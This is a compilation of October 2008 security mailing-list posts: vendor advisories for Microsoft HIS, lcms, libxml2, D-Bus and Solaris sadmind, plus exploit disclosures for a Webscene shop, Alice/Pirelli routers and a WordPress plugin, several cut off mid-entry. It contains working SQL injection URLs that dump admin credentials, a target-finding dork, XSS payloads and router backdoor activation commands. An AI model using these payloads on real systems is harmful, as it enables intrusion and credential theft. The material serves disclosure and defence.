iDefense Security Advisory 10.14.08: Microsoft Host Integration Server 2006 Command Execution Vulnerability
iDefense Security Advisory 10.14.08 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 14, 2008 I. BACKGROUND The Host Integration Server is an application suite that is used to communicate with IBM mainframe servers. One of the components of the suite is a remote management interface. This interface is implemented by an RPC server that listens on a dynamic TCP port. The UUID of the vulnerable RPC service is 'ed6ee250-e0d1-11cf-925a-00aa00c006c1'. For more information regarding the Host Integration Server, see the vendor's website found at the following URL. http://www.microsoft.com/hiserver/default.mspx II. DESCRIPTION Remote exploitation of an arbitrary command execution vulnerability in Microsoft Corp.'s Host Integration Server 2006 could allow an attacker to execute arbitrary code with the privileges of the affected service. The RPC interface exposes several methods that an unauthenticated attacker can use to execute arbitrary programs on the server. RPC opcodes 1 and 6 both allow an attacker to call the CreateProcess() function with full control over the application started, as well as the command line passed to it. This allows an attacker to run arbitrary programs on the server. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service. The privileges gained depend on the user account that the Host Integration Server is configured to use during installation. The service does not require SYSTEM privileges to run. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Host Integration Server 2006. Previous versions may also be affected. V. WORKAROUND Use the Service Control Manager to disable the SNA RPC service, and prevent it from starting automatically. This will prevent the vulnerable service from running, but will also prevent remote management. Firewalling the TCP port is not a valid workaround, since the port used for communication is dynamically assigned when the service starts. VI. VENDOR RESPONSE Microsoft has officially addressed this vulnerability with Security Bulletin MS08-059. For more information, consult their bulletin at the following URL. http://www.microsoft.com/technet/security/bulletin/ms08-059.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3466 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/27/2008 Initial vendor notification. 05/27/2008 Initial vendor response. 10/14/2008 Coordinated public disclosure. IX. CREDIT This vulnerability was reported to iDefense by Stephen Fewer of Harmony Security | (www.harmonysecurity.com ). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[USN-652-1] LittleCMS vulnerability
=== Ubuntu Security Notice USN-652-1 October 14, 2008 lcms vulnerability CVE-2007-2741 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: liblcms11.13-1ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Chris Evans discovered that certain ICC operations in lcms were not correctly bounds-checked. If a user or automated system were tricked into processing an image with malicious ICC tags, a remote attacker could crash applications linked against liblcms1, leading to a denial of service, or possibly execute arbitrary code with user privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13-1ubuntu0.1.diff.gz Size/MD5:13103 4617c440a02960e1f962a88c1c21a9cc http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13-1ubuntu0.1.dsc Size/MD5: 685 507f6385801f19716737a5089d33116d http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13.orig.tar.gz Size/MD5: 585735 e627f43bbbd238895502402d942a6cfd amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_amd64.deb Size/MD5: 136682 f085666f76c9bf1a53942baa18b8e052 http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_amd64.deb Size/MD5: 129070 e50c4bfb5b0e32ec7f3da1ce9e1ee21f http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_amd64.deb Size/MD5:40296 5c58c601e0d9802394cf25b33319b2c9 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_i386.deb Size/MD5: 123518 fd6961be0da7aaf2e2dcb8257d3787da http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_i386.deb Size/MD5: 118222 86dcc1004a11232740c2d6d6903f02a4 http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_i386.deb Size/MD5:37112 d4ffa7a920a4e4aba5f8d197d1ad14f0 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_powerpc.deb Size/MD5: 130806 3da85714083d3d4f1252ae0b1b1fe6e3 http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_powerpc.deb Size/MD5: 131834 38aba2a645449be653dd11be439afcce http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_powerpc.deb Size/MD5:44136 04799ca5393e6acc70592f648b6b846a sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_sparc.deb Size/MD5: 133960 ab907a81dcb99819e9d125b76a34742c http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_sparc.deb Size/MD5: 124964 42864911b8a3f680a7aae8d28701a6c1 http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_sparc.deb Size/MD5:38498 5d040f607c0ec6d411349b0d27b52e73 signature.asc Description: Digital signature
Webscene eCommerce (level) Remote Sql Injection
# # # Webscene eCommerce (level) Remote Sql Injection # # vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm # # # # # Bug Found By :Angela Chang (14-10-2008) # # contact: angel[at]ch4ng.cc # # # # # Greetz: nyubi & Vrs-Chk # # ### vuln file : productlist.php Input passed to the "level" is not properly verified before being used. This can be exploited to execute remote sql injection. exploit : http://somehost/productlist.php?categoryid=20&level=[sql] http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser-- Login admin : http://somehost/admin/ Google dork : inurl:productlist.php?categoryid= level __ _ _ _ __ _ __ __ _ / _` | ___ | |__ _ o O O __| |_ __ _ _ _ / _` | / _` | | ' \\__, | / -_)| | / _` |o / _| | ' \ / _` | | ' \\__, | \__,_| |_||_| |___/ \___| _|_|_ \__,_| TS__[O] \__|_ |_||_| \__,_| |_||_| |___/ _|"|_|"|_|"|_|"|_|"|_|"| {==|_|"|_|"|_|"|_|"|_|"| "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
[SECURITY] [DSA 1654-1] New libxml2 packages fix execution of arbitrary code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1654-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp October 14, 2008 http://www.debian.org/security/faq - Package: libxml2 Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-3529 Debian Bug : 498768 It was discovered that libxml2, the GNOME XML library, didn't correctly handle long entity names. This could allow the execution of arbitrary code via a malicious XML file. For the stable distribution (etch), this problem has been fixed in version 2.6.27.dfsg-5. For the unstable distribution (sid), this problem has been fixed in version 2.6.32.dfsg-4. We recommend that you upgrade your libxml2 package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.diff.gz Size/MD5 checksum: 220443 48cafbb8d1bd2c6093339fea3f14e4a0 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz Size/MD5 checksum: 3416175 5ff71b22f6253a6dd9afc1c34778dec3 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.dsc Size/MD5 checksum: 893 0dc1f183dd20741e5b4e26a7f8e1c652 Architecture independent packages: http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-5_all.deb Size/MD5 checksum: 1328144 c1c5f0ceb391893a94e61c074b677ee9 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 820850 fac5556241bb0fde20913f25fb9c73ac http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum:37980 725b1c6925e610b5843ba0ad554dc7bc http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 184754 5ccbaf07b44dcfe528167074050bf270 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 916830 17d71480b7e2a447dabde99c11d752fa http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_alpha.deb Size/MD5 checksum: 881834 cac19a28b37f7afb9e07966f44ddd5b2 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 184130 a13372752d162d0fb2ccd58da6b73e20 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum:36684 8a0265229bebf9245dc7bb7cc6f41d36 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 796194 6019e59020269cca8fa8fea40f83c118 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 891922 606fc28448bead2709c39a1d3e529a25 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_amd64.deb Size/MD5 checksum: 745758 95bd39eb2818772c43c3351b22326fcd arm architecture (ARM) http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 741876 1b670c6bac3aa9f7df28f7ea3f1e5725 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_arm.deb Size/MD5 checksum:34678 9a992dc251b137a919a813eed2af8489 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 165290 732b4e94b91a086c6b950d187af160bc http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 817514 299c93a812ac02a8aa9da88f4cb5aedf http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_arm.deb Size/MD5 checksum: 673192 d2ff2c26ee8dae05f81c24aa6dfce9b5 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_hppa.deb Size/MD5 checksum: 191876 4d2e33090237b47bc10e9526329f0bc5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-
[USN-653-1] D-Bus vulnerabilities
=== Ubuntu Security Notice USN-653-1 October 14, 2008 dbus vulnerabilities CVE-2008-0595, CVE-2008-3834 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libdbus-1-2 0.60-6ubuntu8.3 Ubuntu 7.04: libdbus-1-3 1.0.2-1ubuntu4.2 Ubuntu 7.10: libdbus-1-3 1.1.1-3ubuntu4.2 Ubuntu 8.04 LTS: libdbus-1-3 1.1.20-1ubuntu3.1 After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: Havoc Pennington discovered that the D-Bus daemon did not correctly validate certain security policies. If a local user sent a specially crafted D-Bus request, they could bypass security policies that had a "send_interface" defined. (CVE-2008-0595) It was discovered that the D-Bus library did not correctly validate certain corrupted signatures. If a local user sent a specially crafted D-Bus request, they could crash applications linked against the D-Bus library, leading to a denial of service. (CVE-2008-3834) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3.diff.gz Size/MD5: 101072 91db84be3ea61eff0348fc42600fa597 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3.dsc Size/MD5: 1172 7bf2e49310068b1302d60e231ebd0878 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60.orig.tar.gz Size/MD5: 1674899 da9561b5e579cedddc34f53427e99a93 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-doc_0.60-6ubuntu8.3_all.deb Size/MD5: 1655972 ef345c4b84a966586b31604caf62742c http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-cil_0.60-6ubuntu8.3_all.deb Size/MD5: 188332 3955ccbcfdec107796c969ec2d60e455 http://security.ubuntu.com/ubuntu/pool/universe/d/dbus/monodoc-dbus-1-manual_0.60-6ubuntu8.3_all.deb Size/MD5: 179500 44024ceebfad7ee32cf4847ceb6b3a71 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-utils_0.60-6ubuntu8.3_amd64.deb Size/MD5: 174908 ab9ed41b239f04c6b82e9197c1408a38 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3_amd64.deb Size/MD5: 355310 ded0be33cf24d3a21af2d55b8638a42e http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-2_0.60-6ubuntu8.3_amd64.deb Size/MD5: 265188 56f5086e786f651384bbb780acae9dd2 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-dev_0.60-6ubuntu8.3_amd64.deb Size/MD5: 329094 1d27f1fc99baa126c26ff9168e885cc5 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-2_0.60-6ubuntu8.3_amd64.deb Size/MD5: 199644 9c14e1470d73c46cabff3053a42e78eb http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-dev_0.60-6ubuntu8.3_amd64.deb Size/MD5: 242656 41fbcad27a6c45cf68b3d7b178218a4e http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-1c2_0.60-6ubuntu8.3_amd64.deb Size/MD5: 173358 bb279da93ccc27e9a64cd57ea1e18817 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-dev_0.60-6ubuntu8.3_amd64.deb Size/MD5: 178754 98c5ca22fbf92760346112dca78cfe0c http://security.ubuntu.com/ubuntu/pool/main/d/dbus/python2.4-dbus_0.60-6ubuntu8.3_amd64.deb Size/MD5: 284604 71c38fb8e22faa11ca9ca5e7f1fa501b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-utils_0.60-6ubuntu8.3_i386.deb Size/MD5: 171382 a177f78f62fc121028276d9d02ea3e3b http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3_i386.deb Size/MD5: 324652 c40bd701686fe1c80e8ddd43039b6740 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-2_0.60-6ubuntu8.3_i386.deb Size/MD5: 246972 a6d76f44725163f972ecd4aba36ff3b0 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-dev_0.60-6ubuntu8.3_i386.deb Size/MD5: 296248 28a5e2b0b3bf2096cf3eeaaffca366b9 http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-2_0.60-6ubuntu8.3_i386.deb Size/MD5: 191726 1cedfbbd185b496d275935fa72a2d12a http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-dev_0.60-6ubuntu8.3_i386.deb Size/MD5: 226512 90777a6ce67e4b3add23263b57ef089d http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-1c2_0.60-6ubuntu8.3_i386.deb Size/MD5: 172326 c0db53b6ce9137d38cdeb2552d0f9931 http://security.ub
Telecom Italia Alice Pirelli routers backdoor discoverd to activate telnet/ftp/tftp from internal LAN/WLAN.
# saxdax & drpepperONE Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactered by Pirelli based on Broadcom platform. # saxdax & drpepperONE Router Vendor: Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli based on Broadcom platform. Model Affected: AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2 plus] AG2P-AG3[Alice Gate W2+]/AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi] Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version are affected. Platforms: Customized Linux version 2.6.8.1 on Broadcom BCM96348 chipset. Vulnerability: enable telnet/ftp/tftp and web-admin from internal lan. Exploitation: internal network lan, versus Router Date: 13 Oct 2008 Authors:saxdax & drpepperONE e-mail: [EMAIL PROTECTED] [EMAIL PROTECTED] Risk: medium>low # 1) Introduction 2) Vulnerability 3) The Exploit 4) The Code 5) Fix # === 1) Introduction === Telecom Italia is the most important Italian ISP offering an ADSL service named "Alice". Telecom Italia rent out with "Alice Adsl" service, different CPE Modem/Router among which the affected ones. The interface to configure these modems are made extremily poor by the provider to ensure more control. There's no way to enable telnet, ftp, tftp or more advanced web pages from the web interface. http://www.telecomitalia.com/ http://adsl.alice.it/ # 2) Vulnerability An attacker can activate and get unauthorized access to the routers administration interface and telnet/ftp/tftp services from internal network. Every user in the LAN (or Wireless LAN) can nevertheless have access to the routers administration interface and telnet/ftp/tftp! If an attacker can get access to the administrator interface and login, he has full control over the routers configuration. # == 3) The Exploit == To enable telnet/ftp/tftp and web-admin interface it is necessary send a special IP packet to router specific ip 192.168.1.1. This works only from internal LAN where an attacker have and ip like 192.168.1.XX. The ip packet send to router must have the following feature: 1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router) 2)Payload size 8 byte 3)The payload are the first 8 byte of a salted md5 of the mac address of device br0 4)br0 in these modems has the same mac of eth0 When the modem receives the packet all services will be enabled. Example: >From a GNU/LINUX distrib: 1)Retrieve br0 maccaddress: arping -I eth0 -c 2 192.168.1.1 ARPING 192.168.1.1 from 192.168.1.2 eth0 Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 8.419ms Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 2.095ms Sent 2 probes (1 broadcast(s)) Received 2 response(s) 2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte long file with the mac address. run the application below and copy the output hash. http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html 3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file (with the tool you like) i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex 4)Telnet to router : telnet 192.168.1.1 BCM96348 ADSL Router Login: admin Password: # === 4) The Code === /* Alice Backdoor Pwd creator by saxdax */ /* this code generates an 8 byte hash to use as the paylod of the ip packet */ /* the mac must be in an hex file and has to be passed as argument to the program */ #include #include #include #include "md5.h" /* * RFC 1321 compliant MD5 implementation * * Copyright (C) 2001-2003 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or *
WP Comment Remix 1.4.3 Multiple Vulnerabilities
___ ChX Security | Advisory #3 | == ->"WP Comment Remix 1.4.3 Multiple Vulnerabilities"<- _ Advisory Information | === Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities Author: g30rg3_x Advisory URL: http://chxsecurity.org/advisories/adv-3-full.txt Date of last update: 2008-10-13 CVE Name: -- Vulnerability Information | == Software: WP Comment Remix Version: 1.4.3 From: Remote Severity: Extremely Critical Impact: Manipulation of data Cross-Site Scripting Type of Advisory: Full Disclosure _ Software Description | === WP Comment Remix adds a plethora of new options and features to Wordpress. From Reply and Quote links for commenters, to a full upgrade to the edit comments pages in the admin panel, WPCR will save you time and effort when running your blog. Vulnerability Description | == WP Comment Remix has multiple vulnerabilities which allow remote attackers to conduct SQL Injection, Cross-Site Scripting and Cross-Site Request Forgery attacks. The SQL Injection is possible due to lack of filtration on the comment post ID variable in the AJAX Comments script. The Cross-Site Scripting is possible due to lack of filtration and escaping on several stored options. The Cross-Site Request Forgery is caused by the lack of the WordPress Nonces on the options panel form. __ Technical Description | * SQL Injection * Inside the script "ajax_comments.php" (around lines 27 to 29): /- $id = $_GET['p']; $comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE comment_post_ID = $id AND comment_approved != 'spam' ORDER BY comment_date DESC"); --/ As you can see in the presented code, the value of $id is taken from HTTP GET p variable and then $id is later used inside the SQL Query of get_results method from the $wpdb object (which allow WordPress plugins developers to pull multiple row results from the database), so we can inject SQL code and the data will later be show as comment data on the script. As and a example we can inject something like this: /-- ajax_comments.php?p=0 UNION SELECT 1,2,user(),4,5,6,7,8,CONCAT(database(),0x3C62723E,version()),10,11,12,13,14,15 -- ---/ To obtain the MySQL user, Database name and MySQL version used on the server. * Cross-Site Scripting * Inside the script "wpcommentremix.php" (around lines 611 to 781) (The next code is truncated to only show the vulnerable parts of the code) /-- $options['replytotext'] = $_POST['replytotext']; ... $options['quotetext'] = $_POST['quotetext']; $options['originallypostedby'] = $_POST['originallypostedby']; $options['sep'] = $_POST['sep']; $options['maxtags'] = $_POST['maxtags']; ... $options['tagsep'] = $_POST['tagsep']; $options['tagheadersep'] = $_POST['tagheadersep']; $options['taglabel'] = $_POST['taglabel']; $options['tagheaderlabel'] = $_POST['tagheaderlabel']; ... ... ... ' /> ... ... ... ... ... ... ---/ This variables totally lack of filtration and escaping so if we store something like this... /-- 5">alert(String.fromCharCode(88,83,83));http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip ___ Solution | == Upgrade to version 1.4.4 ___ Timeline | === Bug Found: 16/09/2008 Vendor Contact: 20/09/2008 Vendor Response: 23/09/2008 Public Disclosure: 13/10/2008 ChX Security http://chxsecurity.org/ (c) 2008 -- Original: http://chxsecurity.org/advisories/adv-3-full.txt
[RISE-2008001] Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability
RISE-2008001 Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability http://risesecurity.org/advisories/RISE-2008001.txt Published: October 14, 2008 Updated: October 14, 2008 INTRODUCTION There exists a vulnerability within a function of the Sun Solstice AdminSuite sadmind, which when properly exploited can lead to remote compromise of the vulnerable system. This vulnerability was confirmed by us in the following versions of the Sun operating system, other versions may be also affected. Sun Solaris 9 SPARC Sun Solaris 9 x86 Sun Solaris 8 SPARC Sun Solaris 8 x86 DETAILS Solstice AdminSuite is a collection of graphical user interface tools and commands used to perform administrative tasks such as managing users, groups, hosts, system files, printers, disks, file systems, terminals, and modems. The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests. The vulnerable function adm_build_path() does does not validate user supplied data when appending it to a stack-based buffer using strcat(), resulting in a stack-based buffer overflow. The exploitation of this vulnerability is trivial and results in remote compromise of the vulnerable system. This is the debug information about this vulnerability (from Sun Solaris 9 x86). Breakpoint 1, 0xd330e5b0 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 (gdb) until *adm_build_path+38 0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 (gdb) x/i $pc 0xd330e5c6 : call 0xd3304fa8 <[EMAIL PROTECTED]> (gdb) x/x $esp+4 0x80411e4: 0x080b7cd0 (gdb) x/x $esp 0x80411e0: 0x08041208 (gdb) x/s 0x080b7cd0 0x80b7cd0: 'A' ... (gdb) x/s 0x08041208 0x8041208: "system.2.1/" (gdb) where #0 0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 #1 0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2 #2 0xd335326b in verify_vers_1 () from /usr/snadm/lib/libadmagt.so.2 #3 0xd3352e88 in verify_validate () from /usr/snadm/lib/libadmagt.so.2 #4 0xd3352cf8 in amsl_verify () from /usr/snadm/lib/libadmagt.so.2 #5 0xd32c8a85 in __0fQNetmgtDispatcherPdispatchRequestP6Hsvc_reqP6J__svcxprt () from /usr/snadm/lib/libadmcom.so.2 #6 0xd32c8656 in __0fQNetmgtDispatcherOreceiveRequestP6Hsvc_reqP6J__svcxprt () from /usr/snadm/lib/libadmcom.so.2 #7 0xd32c837c in _netmgt_receiveRequest () from /usr/snadm/lib/libadmcom.so.2 #8 0xd311d4a3 in _svc_prog_dispatch () from /usr/lib/libnsl.so.1 #9 0xd311d24e in svc_getreq_common () from /usr/lib/libnsl.so.1 #10 0xd311d130 in svc_getreq_poll () from /usr/lib/libnsl.so.1 #11 0xd3121550 in _svc_run () from /usr/lib/libnsl.so.1 #12 0xd3121293 in svc_run () from /usr/lib/libnsl.so.1 #13 0xd32cd165 in __0fQNetmgtDispatcherNstartupServerv () from /usr/snadm/lib/libadmcom.so.2 #14 0xd32cd13b in netmgt_start_agent () from /usr/snadm/lib/libadmcom.so.2 #15 0x0805168f in main () (gdb) stepi 0xd3304fa8 in [EMAIL PROTECTED] () from /usr/snadm/lib/libadmapm.so.2 (gdb) step Single stepping until exit from function [EMAIL PROTECTED], which has no line number information. 0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 (gdb) x/i $pc 0xd330e5cb : add$0x8,%esp (gdb) where #0 0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 #1 0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2 #2 0xaabbccdd in ?? () #3 0x08063000 in ?? () #4 0x08063128 in ?? () #5 0x080b7cd0 in ?? () #6 0x08041730 in ?? () #7 0x0400 in ?? () #8 0x0001 in ?? () #9 0xd336ac8c in ?? () from /usr/snadm/lib/libadmagt.so.2 #10 0x in ?? () (gdb) c Continuing. Breakpoint 1, 0xd330e5b0 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0xaabbccdd in ?? () (gdb) A proof of concept code for this vulnerability can be downloaded from our website http://risesecurity.org/. VENDOR Sun Security Coordination Team was notified of this issue, proper corrections should be available soon. Meanwhile, we recommend disabling the distributed system administration daemon (sadmind). CREDITS This vulnerability was discovered by Adriano Lima <[EMAIL PROTECTED]>. DISCLAIMER The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liab